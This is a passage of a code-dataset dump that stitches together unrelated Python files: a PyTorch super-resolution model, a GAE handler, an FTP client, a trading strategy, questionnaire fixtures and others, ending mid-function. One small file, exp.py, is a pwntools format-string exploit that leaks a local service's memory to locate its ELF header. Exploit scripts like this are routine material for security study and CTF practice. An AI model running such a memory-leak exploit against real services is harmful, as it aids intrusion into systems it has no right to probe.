elif 'tgn' in match or 'TGN' in match:\r\n number_matches_dict['TGN'] += 1\r\n elif 'mimo' in match:\r\n number_matches_dict['MIMO'] += 1\r\n elif 'wiki' in match:\r\n number_matches_dict['Wiki'] += 1 \r\n elif is_number(match):\r\n number_matches_dict['Numbers'] += 1 \r\n elif 'geonames' in match:\r\n number_matches_dict['Geonames'] += 1\r\n else:\r\n number_matches_dict['other'] += 1\r\n return number_matches_dict\r\n\r\ndef type_analyse(list):\r\n scheme_dict = {}\r\n for concept in list:\r\n schemes = concept['schemes']\r\n for scheme in schemes:\r\n scheme_dict[scheme] = scheme_dict.get(scheme, 0) + 1\r\n return scheme_dict","sub_path":"thesaurus/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":27416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"141849898","text":"# -*- coding: utf-8 -*-\n\nimport webapp2\nimport os\nfrom google.appengine.ext.webapp import template\n\nimport user_filter\n\nclass Require(webapp2.RequestHandler):\n def get(self):\n user, nickname = user_filter.do_filter()\n\n self.response.out.write(template.render('html/require.html',\n {\n 'user': user,\n 'nickname': nickname,\n }))\n\n\ndebug = os.environ.get('SERVER_SOFTWARE', '').startswith('Dev')\n \napp = webapp2.WSGIApplication([\n ('/require', Require),\n ], debug=debug)","sub_path":"chap10/option/require.py","file_name":"require.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"598386383","text":"# Reference: https://pytorch.org/vision/stable/_modules/torchvision/models/googlenet.html#googlenet\n\nfrom typing import Any, Callable, List, Optional, Tuple\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import Tensor\n\nfrom model.transformer import Transformer\n\n\nclass TransformerSR(nn.Module):\n\n def __init__(\n self,\n in_channels: int = 3,\n init_weights: Optional[bool] = None,\n blocks: Optional[List[Callable[..., nn.Module]]] = None\n ) -> None:\n super(TransformerSR, self).__init__()\n if blocks is None:\n blocks = [BasicConv2d, MBM]\n\n assert len(blocks) == 2\n conv_block = blocks[0]\n mbm_block = blocks[1]\n\n self.conv1 = conv_block(in_channels, 64, kernel_size=3, stride=1, padding=1)\n self.conv2 = conv_block(64, 192, kernel_size=3, padding=1)\n \n self.mbm3 = mbm_block(192, 128, (96, 164), (96, 164), (64, 96, 96), (64, 128, 128), (64, 128, 128), (64, 64))\n self.maxpool3 = nn.MaxPool2d(2, stride=2, ceil_mode=True)\n self.mbm4 = mbm_block(872, 432, (128, 196), (128, 196), (96, 128, 128), (96, 164, 164), (96, 164, 164), (256, 256))\n self.maxpool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True)\n self.transformers = nn.Sequential(\n Transformer(dim=256, depth=1, heads=4, dim_head=64, mlp_dim=64, dropout=0.2),\n # Transformer(dim=256, depth=3, heads=8, dim_head=64, mlp_dim=64, dropout=0.2),\n )\n\n self.mbm5 = mbm_block(6, 1, (1, 1), (1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1))\n self.conv6 = nn.Conv2d(7, 3, kernel_size=1)\n\n if init_weights:\n self._initialize_weights()\n\n def _initialize_weights(self) -> None:\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n import scipy.stats as stats\n X = stats.truncnorm(-2, 2, scale=0.01)\n values = torch.as_tensor(X.rvs(m.weight.numel()), dtype=m.weight.dtype)\n values = values.view(m.weight.size())\n with torch.no_grad():\n m.weight.copy_(values)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n\n def forward(self, x: Tensor) -> Tuple[Tensor, Optional[Tensor], Optional[Tensor]]:\n # N x 3 x 64 x 64\n x = self.conv1(x)\n # N x 64 x 64 x 64\n x = self.conv2(x)\n # N x 192 x 64 x 64\n x = self.mbm3(x)\n # N x 872 x 64 x 64\n x = self.maxpool3(x)\n # N x 872 x 32 x 32\n x = self.mbm4(x)\n # N x 1536 x 32 x 32\n x = self.maxpool4(x)\n\n # N x 1536 x 16 x 16\n x = torch.flatten(x, start_dim=2)\n # N x 1536 x 256\n if self.transformers is not None:\n x = self.transformers(x)\n \n # N x 1536 x 256\n x = x.view(-1, 6, 256, 256)\n # N x 6 x 256 x 256\n x = self.mbm5(x)\n # N x 7 x 256 x 256\n x = self.conv6(x)\n # N x 3 x 256 x 256\n return x\n\n\nclass MBM(nn.Module):\n\n def __init__(\n self,\n in_channels: int,\n ch_1x1: int,\n ch_1x3: tuple,\n ch_3x1: tuple,\n ch_3x3: tuple,\n ch_3x1d: tuple,\n ch_1x3d: tuple,\n ch_pool: tuple,\n conv_block: Optional[Callable[..., nn.Module]] = None\n ) -> None:\n super(MBM, self).__init__()\n if conv_block is None:\n conv_block = BasicConv2d\n\n self.branch1 = conv_block(in_channels, ch_1x1, kernel_size=1)\n\n self.branch2 = nn.Sequential(\n conv_block(in_channels, ch_1x3[0], kernel_size=1),\n conv_block(ch_1x3[0], ch_1x3[1], kernel_size=(1, 3), padding=(0, 1))\n )\n\n self.branch3 = nn.Sequential(\n conv_block(in_channels, ch_3x1[0], kernel_size=1),\n conv_block(ch_3x1[0], ch_3x1[1], kernel_size=(3,1), padding=(1, 0))\n )\n\n self.branch4 = nn.Sequential(\n conv_block(in_channels, ch_3x3[0], kernel_size=1),\n conv_block(ch_3x3[0], ch_3x3[1], kernel_size=(1,3), padding=(0, 1)),\n conv_block(ch_3x3[1], ch_3x3[2], kernel_size=(3, 1), padding=(1, 0))\n )\n\n self.branch5 = nn.Sequential(\n conv_block(in_channels, ch_3x1d[0], kernel_size=1),\n conv_block(ch_3x1d[0], ch_3x1d[1], kernel_size=(3,1), dilation=2, padding=(2, 0)),\n conv_block(ch_3x1d[1], ch_3x1d[2], kernel_size=1),\n )\n\n self.branch6 = nn.Sequential(\n conv_block(in_channels, ch_1x3d[0], kernel_size=1),\n conv_block(ch_1x3d[0], ch_1x3d[1], kernel_size=(1,3), dilation=2, padding=(0, 2)),\n conv_block(ch_1x3d[1], ch_1x3d[2], kernel_size=1),\n )\n\n self.branch7 = nn.Sequential(\n conv_block(in_channels, ch_pool[0], kernel_size=1),\n nn.MaxPool2d(kernel_size=(3,3), stride=1, padding=1),\n conv_block(ch_pool[0], ch_pool[1], kernel_size=1)\n )\n\n cat_chs = ch_1x1 + ch_1x3[-1] + ch_3x1[-1] + ch_3x3[-1] + ch_3x1d[-1] + ch_1x3d[-1] + ch_pool[-1]\n self.conv1x1 = nn.Conv2d(cat_chs, cat_chs, kernel_size=1)\n self.bn = nn.BatchNorm2d(cat_chs)\n\n def forward(self, x: Tensor) -> Tensor:\n branch1 = self.branch1(x)\n branch2 = self.branch2(x)\n branch3 = self.branch3(x)\n branch4 = self.branch4(x)\n branch5 = self.branch5(x)\n branch6 = self.branch6(x)\n branch7 = self.branch7(x)\n\n outputs = [branch1, branch2, branch3, branch4, branch5, branch6, branch7]\n outputs = torch.cat(outputs, 1)\n outputs = self.bn(self.conv1x1(outputs))\n outputs = self.mish(outputs)\n return outputs\n\n def mish(self, x):\n return x *( torch.tanh(F.softplus(x)))\n\n\nclass BasicConv2d(nn.Module):\n\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n **kwargs: Any\n ) -> None:\n super(BasicConv2d, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)\n self.bn = nn.BatchNorm2d(out_channels, eps=0.001)\n\n def forward(self, x: Tensor) -> Tensor:\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x, inplace=True)\n\n\nif __name__ == '__main__':\n # mbm = MBM(192, 128, (96, 164), (96, 164), (64, 96, 96), (64, 128, 128), (64, 128, 128), (64, 64))\n # print(mbm(torch.randn(4, 192, 64, 64)).shape)\n # print(mbm(torch.randn(4, 192, 32, 32)).shape)\n # mbm2 = MBM(872, 432, (128, 196), (128, 196), (96, 128, 128), (96, 164, 164), (96, 164, 164), (256, 256))\n # print(mbm2(torch.randn(4, 872, 64, 64)).shape)\n # print(mbm2(torch.randn(4, 872, 32, 32)).shape)\n\n net = TransformerSR(3)\n print(net(torch.randn(4, 3, 64, 64)).shape)\n\n\ndef make_model(args):\n return TransformerSR(3)\n","sub_path":"codes/model/transformersr.py","file_name":"transformersr.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"401161982","text":"# 🚨 Don't change the code below 👇\nheight = float(input(\"enter your height in m: \"))\nweight = float(input(\"enter your weight in kg: \"))\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\nbmi = round(weight / (height ** 2))\nmessage = (f\"Your BMI is {bmi}, you are \")\n\nif(bmi < 18.5):\n print(message + \"underweight\")\nelif(bmi >= 18.5 and bmi < 25):\n message = (f\"Your BMI is {bmi}, you have a \")\n print(message + \"normal weight.\")\nelif(bmi >= 25 and bmi < 30):\n print(message + \"slightly overweight.\")\nelif(bmi >= 30 and bmi < 35):\n print(message + \"obese.\")\nelse:\n print(message + \"clinically obese.\")","sub_path":"Beginner/Projects/04_IfElse/CalculateBMI.py","file_name":"CalculateBMI.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"327916330","text":"from pwn import *\n\n\ni=0x8047000\nwhile(1):\n payload=\"%8$x\"+p32(i)\n con=remote(\"127.0.0.1\",9702)\n con.sendline(payload)\n if(not con.can_recv()):\n print(hex(i)+': jump')\n else:\n ret=con.recv()\n print(hex(i)+': '+ret)\n if(ret=='7f454c46' or ret=='464c457f'):\n print('success')\n break\n con.close()\n i=i+8\n sleep(0.2)\n'''\nfor i in range(100):\n con=remote(\"127.0.0.1\",9702)\n payload=(\"abcd%\"+str(i)+\"$x\")\n con.sendline(payload)\n if(con.can_recv()):\n print(str(i)+':'+con.recv())\n else:\n print(str(i)+':crashed')\n con.close()\n sleep(0.5)\n'''\n","sub_path":"mess/leakMemory/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"59855860","text":"from common.model.placepicker.placepicker import PlacePicker\nfrom common.model.rules.rule import Rule\nfrom simulator.gamestate import GameState\n\n\nclass PrepareNewPlaceInPlaceGroup(Rule):\n def __init__(self, place_picker: PlacePicker):\n super().__init__('new place {0}'.format(place_picker.name))\n self.place_picker = place_picker\n self.register_input(self.place_picker)\n\n def apply(self, gamestate: GameState):\n place_group = self.place_picker.submitted()\n place_group.add_new()\n","sub_path":"common/model/rules/preparenewplaceinplacegroup.py","file_name":"preparenewplaceinplacegroup.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"86247335","text":"from Bio import Entrez\r\nfrom Bio import Medline\r\n\r\nEntrez.email = \"pg32943@alunos.uminho.pt\"\r\n\r\n#efectuar o download de identificacoes PubMed dos artigos\r\nhandle = Entrez.esearch(db = \"pubmed\", term = \"Legionella pneumophila philadelphia 1\", retmax=total)\r\nrecord = Entrez.read(handle)\r\nidlist = record[\"IdList\"]\r\n\r\nhandle2 = Entrez.efetch(db=\"pubmed\", id=idlist, rettype=\"medline\", retmode=\"text\")\r\nrecords = list(Medline.parse(handle2))\r\n\r\n#Exportacao de ficheiro com os artigos\r\nrecord_results = open(\"artigos_PubMed.txt\", 'w')\r\nfor record in records:\r\n a1 = \"Title: \" + str(record.get(\"TI\", \"?\")) \r\n a2 = \"\\nAuthors: \" + str(record.get(\"AU\", \"?\")) \r\n a3 = \"\\nSource: \" + str(record.get(\"SO\", \"?\")) \r\n record_results.write(a1)\r\n record_results.write(a2)\r\n record_results.write(a3)\r\n record_results.write(\"\\n\\n\")\r\nrecord_results.close()\r\n","sub_path":"src/pubmed_script.py","file_name":"pubmed_script.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"27929522","text":"from tkinter import *\r\n\r\ndef button(textoBotao,info,funcao):\r\n root = Tk()\r\n root.geometry(\"1200x60+0+0\")\r\n root.config(bg=\"#343434\")\r\n root.overrideredirect(1)\r\n root.wm_attributes('-topmost','true')\r\n for i in range(0,len(textoBotao)):\r\n print(i)\r\n var = StringVar()\r\n label = Label( root, textvariable=info )\r\n button= Button(root, text=textoBotao[i],\r\n fg=\"#eeeeee\",bg=\"#343434\",\r\n activebackground=\"#454545\",\r\n font=('', 32), border = \"0\",\r\n compound=\"center\",command=funcao[i])\r\n button.pack(side=LEFT,anchor=NW, expand=NO, fill=NONE)\r\n root.mainloop()\r\n","sub_path":"interface facil/labelfacil.py","file_name":"labelfacil.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"479143562","text":"#!/usr/bin/env python\n#coding:utf-8\n#author Zhang Shijie\n\nimport socket\nimport sys,os\n\n\nclass Client(object):\n\n def __init__(self,ip_addr): #初始化\n self.sock = socket.socket()\n self.sock.connect(ip_addr)\n self.auth_user = self.auth()\n self.local_path = self.auth_user[1]\n self.ser_path = self.auth_user[2]\n if self.auth_user[0] == \"0\":\n self.interactive()\n\n def auth(self): #用户登录认证和锁定家目录\n username = input(\"login#>>\")\n password = input(\"passw#>>\")\n user = \"%s|%s\" % (username,password)\n self.sock.send(bytes(user,\"utf8\"))\n auth_user = self.sock.recv(1024)\n auth_user = str(auth_user,\"utf8\").split(\"|\")\n local_path = auth_user[1]\n ser_path = auth_user[2]\n if auth_user[0] == \"0\":\n print(\"恭喜您登陆成功!\\n您的本地家目录为:%s\\n您的FTP目录为:ftp:\\\\\\%s\" % (local_path,ser_path))\n return auth_user\n else:\n exit()\n\n def interactive(self): #选择操作:下载或者上传\n try:\n while True:\n cmd = input(\"#>>\")\n if len(cmd) == 0:continue\n cmd_new = cmd.split()\n cmd_type = cmd_new[0]\n if cmd_type == \"get\":\n func = getattr(self,cmd_type)\n func(cmd_new)\n elif cmd_type == \"put\":\n func = getattr(self,cmd_type)\n func(cmd_new)\n else:\n print(\"你输入的命令有误,请输入get命令!\")\n except KeyboardInterrupt:\n self.exit('exit')\n except EOFError:\n self.exit('exit')\n\n def get(self,cmd): #下载\n if len(cmd) == 2:\n print(cmd[1])\n file_msg = \"get|%s\" % cmd[1]\n self.sock.send(bytes(file_msg,\"utf8\"))\n ready = self.sock.recv(1024)\n ready = str(ready,\"utf8\")\n if ready.startswith('get_file-->ready'):\n file_size = int(ready.split(\"-->\")[-1])\n cur_path = self.local_path\n os.path.exists(cur_path) or os.mkdir(cur_path)\n filename = os.path.basename(file_msg.split(\"|\")[-1])\n filename = \"%s/%s\" % (cur_path,filename)\n f = open(filename,'wb')\n self.sock.send(bytes('get_file-->recv',\"utf8\"))\n size_recv = 0\n progress_percent = 0\n while not size_recv == file_size:\n data = self.sock.recv(file_size-size_recv)\n size_recv += len(data)\n f.write(data )\n cur_percent = int(float(size_recv) / file_size * 100)\n if cur_percent > progress_percent:\n progress_percent = cur_percent\n else:\n print(\"文件传输完成!\")\n\n else:\n print('接收到的服务器信息为:%s' % ready)\n\n def put(self,cmd): #上传\n if len(cmd) == 2:\n cur_path = self.local_path\n os.path.exists(cur_path) or os.mkdir(cur_path)\n filename = '%s/%s' %(cur_path,cmd[1])\n if os.path.isfile(filename):\n file_msg = \"put|%s\" % cmd[1]\n self.sock.send(bytes(file_msg,\"utf8\"))\n file_size = os.path.getsize(filename)\n ready_msg = \"put_file-->ready-->%s\" % file_size\n self.sock.send(bytes(ready_msg,\"utf8\"))\n recv_msg = self.sock.recv(1024)\n recv_msg = str(recv_msg,\"utf8\")\n if recv_msg.startswith(\"put_file-->recv\"):\n f = open(filename,'rb')\n size_left = file_size\n while size_left >0:\n if size_left < 1024:\n self.sock.send(f.read(size_left))\n size_left = 0\n else:\n self.sock.send(f.read(1024))\n size_left -= 1024\n else:\n print(\"文件传输完成!\")\n else:#file doesn't exist\n err_msg = \"%s:没有那个文件或目录!\" % filename\n self.sock.send(bytes(err_msg,\"utf8\"))\n\n\n\n\nif __name__ == \"__main__\":\n ip_addr = ('127.0.0.1', 9003)\n s = Client(ip_addr)\n\n","sub_path":"day8/zuoye/ftpserver/FTPclient/ftpclient.py","file_name":"ftpclient.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"471536737","text":"\"\"\"\nAuthor: Allen B. Liu\nProgram: track_strategy.py\nDate: Friday, January 16, 2015\nDescription: Track Strategy\n\"\"\"\nfrom __future__ import division\nimport datetime\nimport math\nimport pandas as pd\nimport numpy as np\nfrom trading.strategies.strategy import Strategy\nfrom core.event import OrderEvent\n\nclass TrackStrategy(Strategy):\n \n def __init__(self, context, config):\n\n # init base class\n Strategy.__init__(self, context, config)\n \n self.trades = {}\n self.notional = float(config['notional'])\n self.index = config['index']\n self.wavePrepare = datetime.datetime.strptime(\"%s %s\" % (context.date, config['wavePrepare']), \"%Y%m%d %H%M%S\") \n self.waveSend = datetime.datetime.strptime(\"%s %s\" % (context.date, config['waveSend']), \"%Y%m%d %H%M%S\")\n \n self.context.eventmanager.create_wave(self.name + \"Prepare\", self.wavePrepare) \n self.context.eventmanager.create_wave(self.name + \"Send\", self.waveSend) \n \n self.composition = self.context.universe.indexcomp.loc[self.index]\n #self.composition['weight'] = (((self.composition['shares'] / self.composition['divisor']) * self.composition['price']) / self.composition['total']) * 100.0\n\n \n def handle_event(self, event):\n Strategy.handle_event(self, event) # call base\n if event.type == \"TIMER\":\n if event.name == (self.name + \"Prepare\"):\n self.prepare_basket(event.datetime) \n if event.name == (self.name + \"Send\"):\n self.send_basket(event.datetime)\n \n def prepare_basket(self, time):\n # compute desired weights\n for ticker in self.composition.index:\n lotsize = self.context.universe.findLotSize(ticker)\n if np.isnan(self.composition.loc[ticker]['weight']) or np.isnan(self.composition.loc[ticker]['price']):\n target = 0\n else:\n shares = (self.notional * (self.composition.loc[ticker]['weight']*0.01)) / self.composition.loc[ticker]['price']\n target = int(round(shares / lotsize, 0) * lotsize)\n \n # check limits\n current = self.portfolio.positions[ticker]['net']\n trade_qty = int(target - current)\n self.trades[ticker] = trade_qty \n \n def send_basket(self, time):\n for ticker,trade_qty in self.trades.items(): \n if trade_qty > 0:\n self.context.eventmanager.publish(OrderEvent(ticker, time, 'MKT', trade_qty, 'BUY'))\n elif trade_qty < 0:\n self.context.eventmanager.publish(OrderEvent(ticker, time, 'MKT', abs(trade_qty), 'SELL')) \n \n def close(self):\n Strategy.close(self) ","sub_path":"trading/strategies/track_strategy.py","file_name":"track_strategy.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"586408994","text":"from questionnaire.models import Questionnaire, Section, SubSection, Question, QuestionGroup, QuestionOption, \\\n QuestionGroupOrder\n\nquestionnaire = Questionnaire.objects.get(name=\"JRF Core English\", description=\"From dropbox as given by Rouslan\")\n\nsection_1 = Section.objects.create(order=5, questionnaire=questionnaire, name=\"Coverage Surveys\",\n title=\"Immunization and Vitamin A Coverage\")\n\nsub_section = SubSection.objects.create(order=1, section=section_1, title=\"Conducted in 2011-2013\")\n\nquestion1 = Question.objects.create(text=\"Year of most recent survey\", UID='C00066', answer_type='MultiChoice',\n export_label='When was the most recent survey conducted?',\n instructions=\"If a coverage survey or other surveys with immunization modules have been conducted from 2011 onwards, indicate whenit took place (if more than one survey took place during this time period, select the latest most recent one)?\")\n\nQuestionOption.objects.create(text=\"2011\", question=question1)\nQuestionOption.objects.create(text=\"2012\", question=question1)\nQuestionOption.objects.create(text=\"2013\", question=question1)\n\nquestion2 = Question.objects.create(text=\"Full title of survey in the language of the original report\",\n export_label='Full title of survey in the language of the original report',\n UID='C00067', answer_type='Text')\nquestion3 = Question.objects.create(text=\"Full title of survey in English\", UID='C00068', answer_type='Text',\n export_label='Full title of survey in English')\n\nparent1 = QuestionGroup.objects.create(subsection=sub_section, order=1)\nparent1.question.add(question3, question2, question1)\nQuestionGroupOrder.objects.create(question=question1, question_group=parent1, order=1)\nQuestionGroupOrder.objects.create(question=question2, question_group=parent1, order=2)\nQuestionGroupOrder.objects.create(question=question3, question_group=parent1, order=3)\n\nsub_section1 = SubSection.objects.create(order=2, section=section_1, title=\"Planned for 2014-2015\")\nquestion_1 = Question.objects.create(text=\"Is a coverage survey planned for the next 24 months?\", UID='C00069',\n export_label='Is a coverage survey planned for the next 24 months?',\n answer_type='MultiChoice', instructions=\"\")\n\nQuestionOption.objects.create(text=\"Yes\", question=question_1)\nQuestionOption.objects.create(text=\"No\", question=question_1)\n\nquestion_2 = Question.objects.create(text=\"What type of survey is planned? (e.g., MICS, DHS, EPI or CES)\",\n export_label='What type of survey is planned? (e.g., MICS, DHS, EPI or CES)',\n UID='C00070', answer_type='Text')\n\nparent2 = QuestionGroup.objects.create(subsection=sub_section1, order=1)\nparent2.question.add(question_1, question_2)\nQuestionGroupOrder.objects.create(question=question_1, question_group=parent2, order=1)\nQuestionGroupOrder.objects.create(question=question_2, question_group=parent2, order=2)\n\n\n# ############################################ GENERATE FIXTURES\n# questionnaires = Questionnaire.objects.all()\n# sections = Section.objects.all()\n# subsections = SubSection.objects.all()\n# questions = Question.objects.all()\n# question_groups = QuestionGroup.objects.all()\n# options = QuestionOption.objects.all()\n# orders = QuestionGroupOrder.objects.all()\n\n# data = serializers.serialize(\"json\", [questionnaires])\n# print data\n\n# data = serializers.serialize(\"json\", [sections])\n# print data\n\n# data = serializers.serialize(\"json\", [subsections])\n# print data\n#\n# data = serializers.serialize(\"json\", [questions])\n# print data\n#\n# data = serializers.serialize(\"json\", [question_groups])\n# print data\n#\n# data = serializers.serialize(\"json\", [options, orders])\n# print data","sub_path":"questionnaire/fixtures/questionnaire/section_4b.py","file_name":"section_4b.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"244258499","text":"import random\nword_list = [\"arward\",\"baboon\",\"camel\"]\nchosen_word = random.choice(word_list)\n\nguess = input(\" Guess a word : \").lower()\n\nfor letter in chosen_word:\n if letter == guess :\n print(\" Right ! \")\n else :\n print(\"wrong !\") \n \n","sub_path":"random_choose_aWord.py","file_name":"random_choose_aWord.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"162344289","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by HazzaCheng on 2020-09-30\n# https://leetcode.com/problems/maximal-square/\nfrom typing import List\n\n\nclass Solution:\n # solution 1\n def maximalSquare1(self, matrix: List[List[str]]) -> int:\n if matrix is None or len(matrix) < 1:\n return 0\n m, n = len(matrix), len(matrix[0])\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n maxSide = 0\n\n for i in range(m):\n for j in range(n):\n if matrix[i][j] == '1':\n dp[i + 1][j + 1] = min(dp[i + 1][j], dp[i][j + 1], dp[i][j]) + 1\n maxSide = max(maxSide, dp[i + 1][j + 1])\n\n return maxSide ** 2\n\n # solution 2\n def maximalSquare2(self, matrix: List[List[str]]) -> int:\n if matrix is None or len(matrix) < 1:\n return 0\n m, n = len(matrix), len(matrix[0])\n dp = [0] * (n + 1)\n maxSide = 0\n\n for i in range(m):\n topLeft = dp[0]\n for j in range(n):\n temp = dp[j + 1]\n if matrix[i][j] == '1':\n dp[j + 1] = min(dp[j], dp[j + 1], topLeft) + 1\n else:\n dp[j + 1] = 0\n topLeft = temp\n maxSide = max(maxSide, dp[j + 1])\n\n return maxSide ** 2\n","sub_path":"python/src/dp/No221_Maximal_Square.py","file_name":"No221_Maximal_Square.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"69750037","text":"# This file was automatically created by FeynRules 2.3.26\n# Mathematica version: 10.3.1 for Mac OS X x86 (64-bit) (December 9, 2015)\n# Date: Sun 3 Sep 2017 23:30:31\n\n\nfrom object_library import all_lorentz, Lorentz\n\nfrom function_library import complexconjugate, re, im, csc, sec, acsc, asec, cot\ntry:\n import form_factors as ForFac \nexcept ImportError:\n pass\n\n\nUUV3 = Lorentz(name = 'UUV3',\n spins = [ -1, -1, 3 ],\n structure = 'P(3,2) + P(3,3)')\n\nSSS3 = Lorentz(name = 'SSS3',\n spins = [ 1, 1, 1 ],\n structure = '1')\n\nFFS3 = Lorentz(name = 'FFS3',\n spins = [ 2, 2, 1 ],\n structure = 'P(-1,1)*Gamma(-1,2,1) - P(-1,2)*Gamma(-1,2,1)')\n\nFFS4 = Lorentz(name = 'FFS4',\n spins = [ 2, 2, 1 ],\n structure = 'Identity(2,1)')\n\nFFS5 = Lorentz(name = 'FFS5',\n spins = [ 2, 2, 1 ],\n structure = 'P(-1,1)*Gamma(-1,2,-2)*ProjM(-2,1)')\n\nFFS6 = Lorentz(name = 'FFS6',\n spins = [ 2, 2, 1 ],\n structure = 'P(-1,2)*Gamma(-1,2,-2)*ProjM(-2,1)')\n\nFFS7 = Lorentz(name = 'FFS7',\n spins = [ 2, 2, 1 ],\n structure = 'P(-1,1)*Gamma(-1,2,-2)*ProjM(-2,1) - P(-1,2)*Gamma(-1,2,-2)*ProjM(-2,1)')\n\nFFS8 = Lorentz(name = 'FFS8',\n spins = [ 2, 2, 1 ],\n structure = 'ProjM(2,1) + ProjP(2,1)')\n\nFFV9 = Lorentz(name = 'FFV9',\n spins = [ 2, 2, 3 ],\n structure = 'Gamma(3,2,1)')\n\nFFV10 = Lorentz(name = 'FFV10',\n spins = [ 2, 2, 3 ],\n structure = 'Gamma(3,2,-1)*ProjM(-1,1)')\n\nFFV11 = Lorentz(name = 'FFV11',\n spins = [ 2, 2, 3 ],\n structure = 'Gamma(3,2,-1)*ProjP(-1,1)')\n\nVVS3 = Lorentz(name = 'VVS3',\n spins = [ 3, 3, 1 ],\n structure = 'P(1,1)*P(2,1) + 2*P(1,1)*P(2,2) + P(1,2)*P(2,2)')\n\nVVS4 = Lorentz(name = 'VVS4',\n spins = [ 3, 3, 1 ],\n structure = 'Metric(1,2)')\n\nVVV3 = Lorentz(name = 'VVV3',\n spins = [ 3, 3, 3 ],\n structure = 'P(3,1)*Metric(1,2) - P(3,2)*Metric(1,2) - P(2,1)*Metric(1,3) + P(2,3)*Metric(1,3) + P(1,2)*Metric(2,3) - P(1,3)*Metric(2,3)')\n\nSSSS3 = Lorentz(name = 'SSSS3',\n spins = [ 1, 1, 1, 1 ],\n structure = '1')\n\nFFVS1 = Lorentz(name = 'FFVS1',\n spins = [ 2, 2, 3, 1 ],\n structure = 'Gamma(3,2,1)')\n\nFFVS2 = Lorentz(name = 'FFVS2',\n spins = [ 2, 2, 3, 1 ],\n structure = 'Gamma(3,2,-1)*ProjM(-1,1)')\n\nFFVS3 = Lorentz(name = 'FFVS3',\n spins = [ 2, 2, 3, 1 ],\n structure = 'Gamma(3,2,-1)*ProjM(-1,1) - 2*Gamma(3,2,-1)*ProjP(-1,1)')\n\nFFVS4 = Lorentz(name = 'FFVS4',\n spins = [ 2, 2, 3, 1 ],\n structure = 'Gamma(3,2,-1)*ProjM(-1,1) + 2*Gamma(3,2,-1)*ProjP(-1,1)')\n\nFFVS5 = Lorentz(name = 'FFVS5',\n spins = [ 2, 2, 3, 1 ],\n structure = 'Gamma(3,2,-1)*ProjM(-1,1) + 4*Gamma(3,2,-1)*ProjP(-1,1)')\n\nVVSS8 = Lorentz(name = 'VVSS8',\n spins = [ 3, 3, 1, 1 ],\n structure = 'Metric(1,2)')\n\nVVVV11 = Lorentz(name = 'VVVV11',\n spins = [ 3, 3, 3, 3 ],\n structure = 'Metric(1,4)*Metric(2,3) - Metric(1,3)*Metric(2,4)')\n\nVVVV12 = Lorentz(name = 'VVVV12',\n spins = [ 3, 3, 3, 3 ],\n structure = 'Metric(1,4)*Metric(2,3) + Metric(1,3)*Metric(2,4) - 2*Metric(1,2)*Metric(3,4)')\n\nVVVV13 = Lorentz(name = 'VVVV13',\n spins = [ 3, 3, 3, 3 ],\n structure = 'Metric(1,4)*Metric(2,3) - Metric(1,2)*Metric(3,4)')\n\nVVVV14 = Lorentz(name = 'VVVV14',\n spins = [ 3, 3, 3, 3 ],\n structure = 'Metric(1,3)*Metric(2,4) - Metric(1,2)*Metric(3,4)')\n\nVVVV15 = Lorentz(name = 'VVVV15',\n spins = [ 3, 3, 3, 3 ],\n structure = 'Metric(1,4)*Metric(2,3) - (Metric(1,3)*Metric(2,4))/2. - (Metric(1,2)*Metric(3,4))/2.')\n\n","sub_path":"Example_UFO/L10_1_kin_mass_SM/lorentz.py","file_name":"lorentz.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"411549758","text":"import os\nfrom cr180_model import CR180Model\nfrom cr181_model import CR181Model\nfrom pos040_model import POS040Model\nfrom fw001_model import FW001Model\nfrom fw003_model import FW003Model\n\nfrom form_util import FormUtil, FormModel\nfrom form_filler import FormFiller\nimport shutil\n\n\nclass PacketFactory:\n def __init__(self):\n raise ValueError(\"Don't construct me\")\n\n @staticmethod\n def generate(ph, event, packet_output_folder, resources_directory): # ==> saves PDF\n \"\"\"\n :type ph: PersonalHistory\n :type event: Event\n \"\"\"\n\n if os.path.exists(packet_output_folder):\n 